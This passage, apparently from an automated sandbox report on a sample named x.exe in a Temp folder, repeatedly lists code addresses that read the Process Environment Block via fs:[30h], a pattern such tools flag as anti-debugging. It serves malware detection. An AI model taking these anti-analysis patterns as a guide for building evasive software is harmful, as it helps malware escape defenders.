        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF5C7 mov eax, dword ptr fs:[00000030h]3_2_344FF5C7
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF5C7 mov eax, dword ptr fs:[00000030h]3_2_344FF5C7
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF5C7 mov eax, dword ptr fs:[00000030h]3_2_344FF5C7
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF5C7 mov eax, dword ptr fs:[00000030h]3_2_344FF5C7
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF5C7 mov eax, dword ptr fs:[00000030h]3_2_344FF5C7
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF5C7 mov eax, dword ptr fs:[00000030h]3_2_344FF5C7
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF5C7 mov eax, dword ptr fs:[00000030h]3_2_344FF5C7
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3458C5FC mov eax, dword ptr fs:[00000030h]3_2_3458C5FC
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3450B5E0 mov eax, dword ptr fs:[00000030h]3_2_3450B5E0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3450B5E0 mov eax, dword ptr fs:[00000030h]3_2_3450B5E0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3450B5E0 mov eax, dword ptr fs:[00000030h]3_2_3450B5E0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3450B5E0 mov eax, dword ptr fs:[00000030h]3_2_3450B5E0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3450B5E0 mov eax, dword ptr fs:[00000030h]3_2_3450B5E0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3450B5E0 mov eax, dword ptr fs:[00000030h]3_2_3450B5E0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345315EF mov eax, dword ptr fs:[00000030h]3_2_345315EF
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34532594 mov eax, dword ptr fs:[00000030h]3_2_34532594
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345BF582 mov eax, dword ptr fs:[00000030h]3_2_345BF582
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3457E588 mov eax, dword ptr fs:[00000030h]3_2_3457E588
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3457E588 mov eax, dword ptr fs:[00000030h]3_2_3457E588
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345045B0 mov eax, dword ptr fs:[00000030h]3_2_345045B0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345045B0 mov eax, dword ptr fs:[00000030h]3_2_345045B0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345885AA mov eax, dword ptr fs:[00000030h]3_2_345885AA
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FD64A mov eax, dword ptr fs:[00000030h]3_2_344FD64A
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FD64A mov eax, dword ptr fs:[00000030h]3_2_344FD64A
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34535654 mov eax, dword ptr fs:[00000030h]3_2_34535654
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3450965A mov eax, dword ptr fs:[00000030h]3_2_3450965A
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3450965A mov eax, dword ptr fs:[00000030h]3_2_3450965A
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3453265C mov eax, dword ptr fs:[00000030h]3_2_3453265C
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3453265C mov ecx, dword ptr fs:[00000030h]3_2_3453265C
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3453265C mov eax, dword ptr fs:[00000030h]3_2_3453265C
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34503640 mov eax, dword ptr fs:[00000030h]3_2_34503640
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3451F640 mov eax, dword ptr fs:[00000030h]3_2_3451F640
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3451F640 mov eax, dword ptr fs:[00000030h]3_2_3451F640
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3451F640 mov eax, dword ptr fs:[00000030h]3_2_3451F640
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3453C640 mov eax, dword ptr fs:[00000030h]3_2_3453C640
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3453C640 mov eax, dword ptr fs:[00000030h]3_2_3453C640
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34500670 mov eax, dword ptr fs:[00000030h]3_2_34500670
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34542670 mov eax, dword ptr fs:[00000030h]3_2_34542670
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34542670 mov eax, dword ptr fs:[00000030h]3_2_34542670
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344F7662 mov eax, dword ptr fs:[00000030h]3_2_344F7662
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344F7662 mov eax, dword ptr fs:[00000030h]3_2_344F7662
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344F7662 mov eax, dword ptr fs:[00000030h]3_2_344F7662
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34513660 mov eax, dword ptr fs:[00000030h]3_2_34513660
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34513660 mov eax, dword ptr fs:[00000030h]3_2_34513660
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34513660 mov eax, dword ptr fs:[00000030h]3_2_34513660
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3453666D mov esi, dword ptr fs:[00000030h]3_2_3453666D
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3453666D mov eax, dword ptr fs:[00000030h]3_2_3453666D
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3453666D mov eax, dword ptr fs:[00000030h]3_2_3453666D
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34593608 mov eax, dword ptr fs:[00000030h]3_2_34593608
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34593608 mov eax, dword ptr fs:[00000030h]3_2_34593608
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34593608 mov eax, dword ptr fs:[00000030h]3_2_34593608
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34593608 mov eax, dword ptr fs:[00000030h]3_2_34593608
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34593608 mov eax, dword ptr fs:[00000030h]3_2_34593608
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34593608 mov eax, dword ptr fs:[00000030h]3_2_34593608
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452D600 mov eax, dword ptr fs:[00000030h]3_2_3452D600
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452D600 mov eax, dword ptr fs:[00000030h]3_2_3452D600
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345BF607 mov eax, dword ptr fs:[00000030h]3_2_345BF607
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3453360F mov eax, dword ptr fs:[00000030h]3_2_3453360F
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345D4600 mov eax, dword ptr fs:[00000030h]3_2_345D4600
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34500630 mov eax, dword ptr fs:[00000030h]3_2_34500630
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34530630 mov eax, dword ptr fs:[00000030h]3_2_34530630
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34505622 mov eax, dword ptr fs:[00000030h]3_2_34505622
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34505622 mov eax, dword ptr fs:[00000030h]3_2_34505622
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34507623 mov eax, dword ptr fs:[00000030h]3_2_34507623
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345AD62C mov ecx, dword ptr fs:[00000030h]3_2_345AD62C
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345AD62C mov ecx, dword ptr fs:[00000030h]3_2_345AD62C
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345AD62C mov eax, dword ptr fs:[00000030h]3_2_345AD62C
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452D6D0 mov eax, dword ptr fs:[00000030h]3_2_3452D6D0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345CA6C0 mov eax, dword ptr fs:[00000030h]3_2_345CA6C0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345006CF mov eax, dword ptr fs:[00000030h]3_2_345006CF
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3457C6F2 mov eax, dword ptr fs:[00000030h]3_2_3457C6F2
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3457C6F2 mov eax, dword ptr fs:[00000030h]3_2_3457C6F2
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344F96E0 mov eax, dword ptr fs:[00000030h]3_2_344F96E0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344F96E0 mov eax, dword ptr fs:[00000030h]3_2_344F96E0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3450C6E0 mov eax, dword ptr fs:[00000030h]3_2_3450C6E0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345056E0 mov eax, dword ptr fs:[00000030h]3_2_345056E0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345056E0 mov eax, dword ptr fs:[00000030h]3_2_345056E0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345056E0 mov eax, dword ptr fs:[00000030h]3_2_345056E0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345266E0 mov eax, dword ptr fs:[00000030h]3_2_345266E0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345266E0 mov eax, dword ptr fs:[00000030h]3_2_345266E0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34508690 mov eax, dword ptr fs:[00000030h]3_2_34508690
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3458C691 mov eax, dword ptr fs:[00000030h]3_2_3458C691
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34510680 mov eax, dword ptr fs:[00000030h]3_2_34510680
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34510680 mov eax, dword ptr fs:[00000030h]3_2_34510680
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34510680 mov eax, dword ptr fs:[00000030h]3_2_34510680
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34510680 mov eax, dword ptr fs:[00000030h]3_2_34510680
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34510680 mov eax, dword ptr fs:[00000030h]3_2_34510680
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34510680 mov eax, dword ptr fs:[00000030h]3_2_34510680
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34510680 mov eax, dword ptr fs:[00000030h]3_2_34510680
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34510680 mov eax, dword ptr fs:[00000030h]3_2_34510680
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34510680 mov eax, dword ptr fs:[00000030h]3_2_34510680
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34510680 mov eax, dword ptr fs:[00000030h]3_2_34510680
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34510680 mov eax, dword ptr fs:[00000030h]3_2_34510680
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34510680 mov eax, dword ptr fs:[00000030h]3_2_34510680
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345BF68C mov eax, dword ptr fs:[00000030h]3_2_345BF68C
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345C86A8 mov eax, dword ptr fs:[00000030h]3_2_345C86A8
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345C86A8 mov eax, dword ptr fs:[00000030h]3_2_345C86A8
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34522755 mov eax, dword ptr fs:[00000030h]3_2_34522755
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34522755 mov eax, dword ptr fs:[00000030h]3_2_34522755
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34522755 mov eax, dword ptr fs:[00000030h]3_2_34522755
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34522755 mov ecx, dword ptr fs:[00000030h]3_2_34522755
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34522755 mov eax, dword ptr fs:[00000030h]3_2_34522755
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34522755 mov eax, dword ptr fs:[00000030h]3_2_34522755
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345AE750 mov eax, dword ptr fs:[00000030h]3_2_345AE750
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34533740 mov eax, dword ptr fs:[00000030h]3_2_34533740
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF75B mov eax, dword ptr fs:[00000030h]3_2_344FF75B
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF75B mov eax, dword ptr fs:[00000030h]3_2_344FF75B
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF75B mov eax, dword ptr fs:[00000030h]3_2_344FF75B
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF75B mov eax, dword ptr fs:[00000030h]3_2_344FF75B
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF75B mov eax, dword ptr fs:[00000030h]3_2_344FF75B
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF75B mov eax, dword ptr fs:[00000030h]3_2_344FF75B
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF75B mov eax, dword ptr fs:[00000030h]3_2_344FF75B
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF75B mov eax, dword ptr fs:[00000030h]3_2_344FF75B
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FF75B mov eax, dword ptr fs:[00000030h]3_2_344FF75B
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3453174A mov eax, dword ptr fs:[00000030h]3_2_3453174A
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34530774 mov eax, dword ptr fs:[00000030h]3_2_34530774
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34504779 mov eax, dword ptr fs:[00000030h]3_2_34504779
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34504779 mov eax, dword ptr fs:[00000030h]3_2_34504779
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34512760 mov ecx, dword ptr fs:[00000030h]3_2_34512760
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34541763 mov eax, dword ptr fs:[00000030h]3_2_34541763
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34541763 mov eax, dword ptr fs:[00000030h]3_2_34541763
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34541763 mov eax, dword ptr fs:[00000030h]3_2_34541763
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34541763 mov eax, dword ptr fs:[00000030h]3_2_34541763
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34541763 mov eax, dword ptr fs:[00000030h]3_2_34541763
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34541763 mov eax, dword ptr fs:[00000030h]3_2_34541763
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FB705 mov eax, dword ptr fs:[00000030h]3_2_344FB705
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FB705 mov eax, dword ptr fs:[00000030h]3_2_344FB705
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FB705 mov eax, dword ptr fs:[00000030h]3_2_344FB705
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FB705 mov eax, dword ptr fs:[00000030h]3_2_344FB705
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3450471B mov eax, dword ptr fs:[00000030h]3_2_3450471B
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3450471B mov eax, dword ptr fs:[00000030h]3_2_3450471B
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345BF717 mov eax, dword ptr fs:[00000030h]3_2_345BF717
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3450D700 mov ecx, dword ptr fs:[00000030h]3_2_3450D700
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345C970B mov eax, dword ptr fs:[00000030h]3_2_345C970B
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345C970B mov eax, dword ptr fs:[00000030h]3_2_345C970B
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452270D mov eax, dword ptr fs:[00000030h]3_2_3452270D
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452270D mov eax, dword ptr fs:[00000030h]3_2_3452270D
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452270D mov eax, dword ptr fs:[00000030h]3_2_3452270D
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34529723 mov eax, dword ptr fs:[00000030h]3_2_34529723
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345BF7CF mov eax, dword ptr fs:[00000030h]3_2_345BF7CF
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345077F9 mov eax, dword ptr fs:[00000030h]3_2_345077F9
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345077F9 mov eax, dword ptr fs:[00000030h]3_2_345077F9
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3452E7E0 mov eax, dword ptr fs:[00000030h]3_2_3452E7E0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345037E4 mov eax, dword ptr fs:[00000030h]3_2_345037E4
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345037E4 mov eax, dword ptr fs:[00000030h]3_2_345037E4
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345037E4 mov eax, dword ptr fs:[00000030h]3_2_345037E4
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345037E4 mov eax, dword ptr fs:[00000030h]3_2_345037E4
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345037E4 mov eax, dword ptr fs:[00000030h]3_2_345037E4
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345037E4 mov eax, dword ptr fs:[00000030h]3_2_345037E4
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345037E4 mov eax, dword ptr fs:[00000030h]3_2_345037E4
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34531796 mov eax, dword ptr fs:[00000030h]3_2_34531796
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34531796 mov eax, dword ptr fs:[00000030h]3_2_34531796
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3457E79D mov eax, dword ptr fs:[00000030h]3_2_3457E79D
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3457E79D mov eax, dword ptr fs:[00000030h]3_2_3457E79D
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3457E79D mov eax, dword ptr fs:[00000030h]3_2_3457E79D
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3457E79D mov eax, dword ptr fs:[00000030h]3_2_3457E79D
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3457E79D mov eax, dword ptr fs:[00000030h]3_2_3457E79D
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3457E79D mov eax, dword ptr fs:[00000030h]3_2_3457E79D
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3457E79D mov eax, dword ptr fs:[00000030h]3_2_3457E79D
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3457E79D mov eax, dword ptr fs:[00000030h]3_2_3457E79D
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3457E79D mov eax, dword ptr fs:[00000030h]3_2_3457E79D
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345DB781 mov eax, dword ptr fs:[00000030h]3_2_345DB781
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345DB781 mov eax, dword ptr fs:[00000030h]3_2_345DB781
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345D17BC mov eax, dword ptr fs:[00000030h]3_2_345D17BC
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345007A7 mov eax, dword ptr fs:[00000030h]3_2_345007A7
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345CD7A7 mov eax, dword ptr fs:[00000030h]3_2_345CD7A7
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345CD7A7 mov eax, dword ptr fs:[00000030h]3_2_345CD7A7
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345CD7A7 mov eax, dword ptr fs:[00000030h]3_2_345CD7A7
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34501051 mov eax, dword ptr fs:[00000030h]3_2_34501051
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34501051 mov eax, dword ptr fs:[00000030h]3_2_34501051
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345D505B mov eax, dword ptr fs:[00000030h]3_2_345D505B
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34530044 mov eax, dword ptr fs:[00000030h]3_2_34530044
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34507072 mov eax, dword ptr fs:[00000030h]3_2_34507072
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34506074 mov eax, dword ptr fs:[00000030h]3_2_34506074
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34506074 mov eax, dword ptr fs:[00000030h]3_2_34506074
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345A9060 mov eax, dword ptr fs:[00000030h]3_2_345A9060
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34525004 mov eax, dword ptr fs:[00000030h]3_2_34525004
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34525004 mov ecx, dword ptr fs:[00000030h]3_2_34525004
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_34508009 mov eax, dword ptr fs:[00000030h]3_2_34508009
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FD02D mov eax, dword ptr fs:[00000030h]3_2_344FD02D
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3451B0D0 mov eax, dword ptr fs:[00000030h]3_2_3451B0D0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FB0D6 mov eax, dword ptr fs:[00000030h]3_2_344FB0D6
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FB0D6 mov eax, dword ptr fs:[00000030h]3_2_344FB0D6
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FB0D6 mov eax, dword ptr fs:[00000030h]3_2_344FB0D6
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FB0D6 mov eax, dword ptr fs:[00000030h]3_2_344FB0D6
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3453D0F0 mov eax, dword ptr fs:[00000030h]3_2_3453D0F0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_3453D0F0 mov ecx, dword ptr fs:[00000030h]3_2_3453D0F0
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344F90F8 mov eax, dword ptr fs:[00000030h]3_2_344F90F8
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344F90F8 mov eax, dword ptr fs:[00000030h]3_2_344F90F8
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344F90F8 mov eax, dword ptr fs:[00000030h]3_2_344F90F8
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344F90F8 mov eax, dword ptr fs:[00000030h]3_2_344F90F8
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FC0F6 mov eax, dword ptr fs:[00000030h]3_2_344FC0F6
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FA093 mov ecx, dword ptr fs:[00000030h]3_2_344FA093
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345D4080 mov eax, dword ptr fs:[00000030h]3_2_345D4080
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345D4080 mov eax, dword ptr fs:[00000030h]3_2_345D4080
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345D4080 mov eax, dword ptr fs:[00000030h]3_2_345D4080
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345D4080 mov eax, dword ptr fs:[00000030h]3_2_345D4080
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345D4080 mov eax, dword ptr fs:[00000030h]3_2_345D4080
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345D4080 mov eax, dword ptr fs:[00000030h]3_2_345D4080
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345D4080 mov eax, dword ptr fs:[00000030h]3_2_345D4080
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FC090 mov eax, dword ptr fs:[00000030h]3_2_344FC090
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345D50B7 mov eax, dword ptr fs:[00000030h]3_2_345D50B7
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345400A5 mov eax, dword ptr fs:[00000030h]3_2_345400A5
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345BB0AF mov eax, dword ptr fs:[00000030h]3_2_345BB0AF
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345AF0A5 mov eax, dword ptr fs:[00000030h]3_2_345AF0A5
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345AF0A5 mov eax, dword ptr fs:[00000030h]3_2_345AF0A5
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345AF0A5 mov eax, dword ptr fs:[00000030h]3_2_345AF0A5
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345AF0A5 mov eax, dword ptr fs:[00000030h]3_2_345AF0A5
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345AF0A5 mov eax, dword ptr fs:[00000030h]3_2_345AF0A5
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345AF0A5 mov eax, dword ptr fs:[00000030h]3_2_345AF0A5
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345AF0A5 mov eax, dword ptr fs:[00000030h]3_2_345AF0A5
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FA147 mov eax, dword ptr fs:[00000030h]3_2_344FA147
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FA147 mov eax, dword ptr fs:[00000030h]3_2_344FA147
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_344FA147 mov eax, dword ptr fs:[00000030h]3_2_344FA147
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345D3157 mov eax, dword ptr fs:[00000030h]3_2_345D3157
        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_345D3157 mov eax, dword ptr fs:[00000030h]3_2_345D3157
